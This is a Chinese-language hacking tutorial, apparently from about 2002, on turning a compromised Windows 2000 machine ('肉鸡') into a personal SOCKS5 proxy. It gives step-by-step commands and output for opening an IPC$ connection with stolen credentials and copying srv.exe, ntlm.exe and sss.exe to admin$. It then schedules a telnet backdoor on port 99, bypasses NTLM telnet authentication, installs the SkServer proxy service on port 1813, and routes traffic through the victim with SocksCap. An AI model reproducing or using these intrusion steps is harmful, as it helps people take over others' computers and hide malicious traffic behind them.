需要软件:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。
首先我们在命令提示符下建立IPC$管道:
net use //127.0.0.1/ipc$ "密码" /user:帐号
通道建立好后,我们把srv.exe sss.exe ntlm.exe全部上传。
c:/copy srv.exe //10.10.10.10/admin$
1 files copied! <br>
c:/copy ntlm.exe //10.10.10.10/admin$ <br>
1 files copied! <br>
c:/copy sss.exe //10.10.10.10/admin$ <br>
1 files copied! <br>
复制完毕后, <br>
看肉鸡上现在的时间: <br>
c:/net time //127.0.0.1 <br>
显示当前时间是 2002/4/13 晚上 09:00 <br>
我们来启动srv.exe <br>
c:/at //127.0.0.1 09:01 srv.exe <br>
等到09:01后。我们来连接肉鸡: <br>
c:/telnet 127.0.0.1 99 <br>
连上后显示: <br>
c:/winnt/system32> <br>
接着我们启动NTLM.exe <br>
c:/winnt/system32>ntlm <br>
显示: <br>
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. <br>
Done! <br>
C:/WINNT/system32> <br>
首先我们终止srv.exe的telnet服务: <br>
C:/WINNT/system32>net stop telnet <br>
继续: <br>
C:/WINNT/system32>net start telnet <br>
再启动TELNET。 <br>
OK,我们来登陆 <br>
c:>telnet 127.0.0.1 <br>
*========================================================== <br>
Microsoft Telnet <br>
*========================================================== <br>
c:> <br>
好了,一切顺利,我们现在正式开始做代理: <br>
c:>sss.exe -install <---------开始安装 <br>
显示: <br>
c:>sksockserver installed! <br>
来看看配置: <br>
c:>sss -config show <br>
显示: <br>
SkServer Port = 1813 <----开放服务的端口 ,我们记着这个1813端口哦 <br>
SkServer StartType: 3 - Manual <---服务启动方式 <br>
SkServer Enable Client Set Num:0 <---客户端的项目个数 <br>
SkServer Pass SkServer Number:0 <---经过SkServer的项目个数 <br>
<br>
来启动服务: <br>
c:>net start skserver <br>
提示你正在启动,并且完成。 <br>
来检查一下是不是启动了: <br>
c:>net start <-----------看看启动的服务列表 <br>
These Windows 2000 services are started: <br>
<br>
Print Spooler <br>
Server <br>
Snake SockProxy Service <---------------就是它,呵呵! <br>
System Event Notification <br>
TCP/IP NetBIOS Helper Service <br>
Telephony <br>
Telnet <br>
The command completed successfully. <br>
<br>
c:>_ <br>
好了,到这里我们已经做好了一个socks5代理了,我们自己的哦.OK,下面我们用sockscap来使用我们做代理。 <br>
安装好SocksCap后,我们在桌面上打开SocksCap V2,点开File选项选Settings...弹出卡片,在 SOCKS
Server里面我们填肉鸡的IP:127.0.0.1,PortT填默认的1813端口,下面的我们选socks version 5,呵呵,和
Attempt local then remot,这是域名解析的顺序,先本地,然后才远程。设置完了点“确定”我们就可以使用了,添加应用程序到sockscap里面,点开那个"new"按钮,会弹出一个卡片,
<br>
Profile name :程序名,随便写。 <br>
Command Line: 命令行,点后面的Browse...找到你的程序路径 <br>
Working:填好上面那个,这个就自动加上. <br>
这样我们就把程序加到SocksCap里面了。 <br>
现在们可以双击里面的程序来使用,也可以选住程序在点Run来运行。